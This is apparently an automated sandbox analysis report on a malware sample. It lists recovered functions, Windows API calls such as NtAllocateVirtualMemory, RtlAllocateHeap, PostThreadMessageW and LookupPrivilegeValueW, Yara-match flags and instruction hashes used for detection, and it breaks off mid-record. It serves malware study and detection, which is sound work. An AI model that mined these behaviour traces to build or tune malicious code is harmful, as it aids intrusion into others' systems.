• Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Control-flow Graph
control_flow_graph 286 41a500-41a516 287 41a51c-41a53d NtAllocateVirtualMemory 286->287 288 41a517 call 41af20 286->288 288->287
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
Memory Dump Source
• Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4

Control-flow Graph
control_flow_graph 289 41a4fb-41a53d call 41af20 NtAllocateVirtualMemory
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
Memory Dump Source
• Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: aaf07d7c655785086d8b5f0a451b4062681b2a67c108c2b33990bb495246c866
• Instruction ID: 94507bbf397dcc5c3ac71cc5815c082cb0521fc5d078fd0b1a8f82b8904cbc8a
• Opcode Fuzzy Hash: aaf07d7c655785086d8b5f0a451b4062681b2a67c108c2b33990bb495246c866
• Instruction Fuzzy Hash: 48F030B62001496BCB15DF98DC85CA777A9BF88214B15865EFD489B203C634D865CBA0
APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
Memory Dump Source
• Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 3633968ca4f3d3abc0fc2ebd89152368de9531e50e60495f0fab90ebf612694e
• Instruction ID: 85268407bda5badd3f005600f786efbf3729bfdc64a558162e38e0f63659b094
• Opcode Fuzzy Hash: 3633968ca4f3d3abc0fc2ebd89152368de9531e50e60495f0fab90ebf612694e
• Instruction Fuzzy Hash: 00E0C272200204AFDB20DFA9DC89FEB7B68EF44364F14455AFA0CDB282C531E6118B90
APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
Memory Dump Source
• Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 88415975a41e7ac61ff931bca4e8b1d9f758cc42794afb0c7ceb9012e23bff74
• Instruction ID: 12d7ebf5174ceaa7811a245f4774e7774467df854912f2606075ad35dbf1aec8
• Opcode Fuzzy Hash: 88415975a41e7ac61ff931bca4e8b1d9f758cc42794afb0c7ceb9012e23bff74
• Instruction Fuzzy Hash: FA9002A170640003420571984424616800A97E0202B95C131E10145A0DC5258A916226
APIs
Memory Dump Source
• Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a9748b509f974c50bf53c84f3123e235aac9c527148dbf38835229bb2d5f7720
• Instruction ID: 084a8acc741c9e8a3a25d99fc450d31364c7eb0c28937a69ae26a775d3c2b1d4
• Opcode Fuzzy Hash: a9748b509f974c50bf53c84f3123e235aac9c527148dbf38835229bb2d5f7720
• Instruction Fuzzy Hash: A890027170540802D2807198441464A400597D1302FD5C125A0025664DCA158B5977A2
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: cbab8fac67087a464f4193a80ec6b312f7fc518b9a762dba3cddf41ab211ed33
                                                                                                                                            • Instruction ID: b589b75201ada251a34e09defe9ddee34780b67e53d1e24a590998e2ec5187d9
                                                                                                                                            • Opcode Fuzzy Hash: cbab8fac67087a464f4193a80ec6b312f7fc518b9a762dba3cddf41ab211ed33
                                                                                                                                            • Instruction Fuzzy Hash: 9F900265715400030205B5980714507404697D5352395C131F1015560CD6218A615222
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: dae2e7000b62a58d81d3fb458515c028e7f2e8964cc51e8104bf0ff92ccb97a6
                                                                                                                                            • Instruction ID: 2ba63436e72da9f41afc95f4ef6cbc38bd2dbe21c94194d2d36795762eb367d5
                                                                                                                                            • Opcode Fuzzy Hash: dae2e7000b62a58d81d3fb458515c028e7f2e8964cc51e8104bf0ff92ccb97a6
                                                                                                                                            • Instruction Fuzzy Hash: 3190026170540003D240719854286068005E7E1302F95D121E0414564CD9158A565323
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: c8a81f18757d086598bb8fc00edd3cd8b32dad62f59cb033b373b97f3e1f0c6d
                                                                                                                                            • Instruction ID: 07032ae26a7f142e872e84e37bf0c1d56295748526bb8215d5325d2c20405fdc
                                                                                                                                            • Opcode Fuzzy Hash: c8a81f18757d086598bb8fc00edd3cd8b32dad62f59cb033b373b97f3e1f0c6d
                                                                                                                                            • Instruction Fuzzy Hash: C790026971740002D2807198541860A400597D1203FD5D525A0015568CC9158A695322
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 082232a59f308d2fbdbc7c31a977ad1c819c93f8fb106af6fc0ec15daf437d0f
                                                                                                                                            • Instruction ID: 5267a7cca001844dfa60f0f453cf531a4666f4c6d9d669913b67516c2285da40
                                                                                                                                            • Opcode Fuzzy Hash: 082232a59f308d2fbdbc7c31a977ad1c819c93f8fb106af6fc0ec15daf437d0f
                                                                                                                                            • Instruction Fuzzy Hash: D990027170540413D21171984514707400997D0242FD5C522A0424568DD6568B52A222
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 1f25c3a6c2e969849d43ecffb709e165346cec0e50afcb50d131b7db0dcaa55b
                                                                                                                                            • Instruction ID: 5003fc47589fe078933a4a174dfd8c86d92fb69081e1e840d01de9c70a4b4178
                                                                                                                                            • Opcode Fuzzy Hash: 1f25c3a6c2e969849d43ecffb709e165346cec0e50afcb50d131b7db0dcaa55b
                                                                                                                                            • Instruction Fuzzy Hash: AD900261746441525645B19844145078006A7E02427D5C122A1414960CC5269A56D722
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 2f256decff31a9a8bce0b041a2e7d2ac74a23e825439a21ae4889e6383aa0e28
                                                                                                                                            • Instruction ID: 1cd384c886c992e70400a000f0aa665087263f87a2c2c32036fad086150b92a6
                                                                                                                                            • Opcode Fuzzy Hash: 2f256decff31a9a8bce0b041a2e7d2ac74a23e825439a21ae4889e6383aa0e28
                                                                                                                                            • Instruction Fuzzy Hash: D390027170548802D2107198841474A400597D0302F99C521A4424668DC6958A917222
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 068745f1fb3db0a461bf578f4fe6d233afc00f3272c79325a1c3b5eb557c8013
                                                                                                                                            • Instruction ID: 9fe8dfb865427f8f968dbb3e68a45d9693adc4e793c8ea4967804cdb47d1b227
                                                                                                                                            • Opcode Fuzzy Hash: 068745f1fb3db0a461bf578f4fe6d233afc00f3272c79325a1c3b5eb557c8013
                                                                                                                                            • Instruction Fuzzy Hash: CD90027170540402D20075D85418646400597E0302F95D121A5024565EC6658A916232
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 3b7ebf6629991fb2157251fc6657d883c1880737fa8f4734151aab861f61bf22
                                                                                                                                            • Instruction ID: 6fde472284f6ee54a21ce4eb8ac6833acf9188cc5bfb7308834464a13a54096c
                                                                                                                                            • Opcode Fuzzy Hash: 3b7ebf6629991fb2157251fc6657d883c1880737fa8f4734151aab861f61bf22
                                                                                                                                            • Instruction Fuzzy Hash: AE9002A174540442D20071984424B064005D7E1302F95C125E1064564DC619CE526227
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 06a9e774ddda6dd133f0d1016f1516332e524ef8ecc85d3edb59c89e64f2c972
                                                                                                                                            • Instruction ID: 8bb9b63ee5d5c3716a2740af00096135313ee6a93ec22701f0e722b9f14fbd74
                                                                                                                                            • Opcode Fuzzy Hash: 06a9e774ddda6dd133f0d1016f1516332e524ef8ecc85d3edb59c89e64f2c972
                                                                                                                                            • Instruction Fuzzy Hash: 8C900261715C0042D30075A84C24B07400597D0303F95C225A0154564CC9158A615622
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: d6ce51c1e4f24c9d2decdb6b01db7b597bd4c50d9a5d297f1158d9cbb28f5bd6
                                                                                                                                            • Instruction ID: fcf9ec9773cd3580b1b771079a7a8c43d7ca8ea5c205309152f824ff8e6c0657
                                                                                                                                            • Opcode Fuzzy Hash: d6ce51c1e4f24c9d2decdb6b01db7b597bd4c50d9a5d297f1158d9cbb28f5bd6
                                                                                                                                            • Instruction Fuzzy Hash: CD900261B0540042424071A888549068005BBE1212795C231A0998560DC5598A655766
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 97732862fe78fad66edce4e4ae524a9c4b3498c405835e33f5adfea715b1f45c
                                                                                                                                            • Instruction ID: 67d1a144154ae728617270a025bf7c8ae92716db71841c9f3917107165eed600
                                                                                                                                            • Opcode Fuzzy Hash: 97732862fe78fad66edce4e4ae524a9c4b3498c405835e33f5adfea715b1f45c
                                                                                                                                            • Instruction Fuzzy Hash: 7A90027170580402D2007198482470B400597D0303F95C121A1164565DC6258A516672
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: e9b5a6148c94d993cb9c8144c840207afe03a3be0d913fa51ff3443aaa960345
                                                                                                                                            • Instruction ID: ba377da9deda8241eb90e85346f8eb7f45e027c078121d2fc2ee693087a3c51b
                                                                                                                                            • Opcode Fuzzy Hash: e9b5a6148c94d993cb9c8144c840207afe03a3be0d913fa51ff3443aaa960345
                                                                                                                                            • Instruction Fuzzy Hash: CE9002B170540402D24071984414746400597D0302F95C121A5064564EC6598FD56766
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 9bc74c64df4a4fff80bdadc1ae82d6e833975b90361e9f5ac0f21c8b6824c197
                                                                                                                                            • Instruction ID: da004defd7e15679e400dad870e2559dcd43d1201d07f7e22b5d7c9481905015
                                                                                                                                            • Opcode Fuzzy Hash: 9bc74c64df4a4fff80bdadc1ae82d6e833975b90361e9f5ac0f21c8b6824c197
                                                                                                                                            • Instruction Fuzzy Hash: 81900261B0540502D20171984414616400A97D0242FD5C132A1024565ECA258B92A232
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                            • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                                            • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                            • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6

                                                                                                                                             Control-flow Graph
                                                                                                                                             • control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID: &EA
                                                                                                                                            • API String ID: 1279760036-1330915590
                                                                                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                            • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                            • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0

                                                                                                                                             Control-flow Graph
                                                                                                                                             • control_flow_graph 202 4082d4-4082d8 203 408331-408343 call 40ace0 202->203 204 4082da-4082db 202->204 206 408347-40835a call 414e40 203->206 204->206 207 4082dd-4082fd call 41b860 call 41b710 204->207 213 40835c-40836e PostThreadMessageW 206->213 214 40838e-408392 206->214 216 408370-40838a call 40a470 213->216 217 40838d 213->217 216->217 217->214
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 0c5670ac6251c0a60da8687f5d77d26f275b51540f007e75c674e4efe23d972f
                                                                                                                                            • Instruction ID: 19c01656c3898c69e84ee8908718035e3049677ab4d7dde92baba569fadc05e3
                                                                                                                                            • Opcode Fuzzy Hash: 0c5670ac6251c0a60da8687f5d77d26f275b51540f007e75c674e4efe23d972f
                                                                                                                                            • Instruction Fuzzy Hash: 50012D3164031C77E711B5615C02FEE7358AB84B54F09017EFE44FB2C1DAB96D0642E9

                                                                                                                                             Control-flow Graph
                                                                                                                                             • control_flow_graph 221 40830c-40833d call 41be20 call 41c9c0 226 408343-40835a call 414e40 221->226 227 40833e call 40ace0 221->227 231 40835c-40836e PostThreadMessageW 226->231 232 40838e-408392 226->232 227->226 233 408370-40838a call 40a470 231->233 234 40838d 231->234 233->234 234->232
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 19c66865f75542f675f54a46dd6cd54def56d3851c5970707138c9339e0e24a1
                                                                                                                                            • Instruction ID: 8733b47f60013285a8807cb7a5d81815fd96b1e7676cb7f4731c5b02c55d18d7
                                                                                                                                            • Opcode Fuzzy Hash: 19c66865f75542f675f54a46dd6cd54def56d3851c5970707138c9339e0e24a1
                                                                                                                                            • Instruction Fuzzy Hash: 7601D871A803187AE720A6918C03FFE6B1C9B41B55F05016EFF04FA1C1D6A9290647E9

                                                                                                                                             Control-flow Graph
                                                                                                                                             • control_flow_graph 237 408310-40831f 238 408328-40833d call 41c9c0 237->238 239 408323 call 41be20 237->239 242 408343-40835a call 414e40 238->242 243 40833e call 40ace0 238->243 239->238 247 40835c-40836e PostThreadMessageW 242->247 248 40838e-408392 242->248 243->242 249 408370-40838a call 40a470 247->249 250 40838d 247->250 249->250 250->248
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                            • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                                                                            • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                            • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA

                                                                                                                                             Control-flow Graph
                                                                                                                                             • control_flow_graph 253 408393-408394 255 408333-40833d 253->255 256 40832e call 41c9c0 253->256 257 408343-40835a call 414e40 255->257 258 40833e call 40ace0 255->258 256->255 262 40835c-40836e PostThreadMessageW 257->262 263 40838e-408392 257->263 258->257 264 408370-40838a call 40a470 262->264 265 40838d 262->265 264->265 265->263
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 8c991781031f8c6d473ebbd6a23dc71827103370b9fd2e7a6c452dfc9f5126f3
                                                                                                                                            • Instruction ID: 3e3665392b07dc50b903ca1482a20c39a0d8d9c50d14a314250b7dbfb1e47f4d
                                                                                                                                            • Opcode Fuzzy Hash: 8c991781031f8c6d473ebbd6a23dc71827103370b9fd2e7a6c452dfc9f5126f3
                                                                                                                                            • Instruction Fuzzy Hash: 2DF02271A8032877E7206A544C02FFF27185B81F14F09016EFE84FA1C1DABE690202EA

                                                                                                                                             Control-flow Graph
                                                                                                                                             • control_flow_graph 292 41a781-41a7aa call 41af20 294 41a7af-41a7c4 LookupPrivilegeValueW 292->294
                                                                                                                                            APIs
                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                            • Opcode ID: 6f60b12bae23740ddff04b9b2a435f9d619a484c6c9bb8091acf3cd8a9da8c8a
                                                                                                                                            • Instruction ID: f7a5976cd5a0d784b45962738d5861c56f65e69eb5b5f090e7fa20213427d3ba
                                                                                                                                            • Opcode Fuzzy Hash: 6f60b12bae23740ddff04b9b2a435f9d619a484c6c9bb8091acf3cd8a9da8c8a
                                                                                                                                            • Instruction Fuzzy Hash: 10F0EDB2200204ABDB24DF55DC85EE733A9EF89318F1080AEF90D6B241CA35E805CBB0

                                                                                                                                             Control-flow Graph
                                                                                                                                             • control_flow_graph 295 41a630-41a661 call 41af20 RtlFreeHeap
                                                                                                                                            APIs
                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                            • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
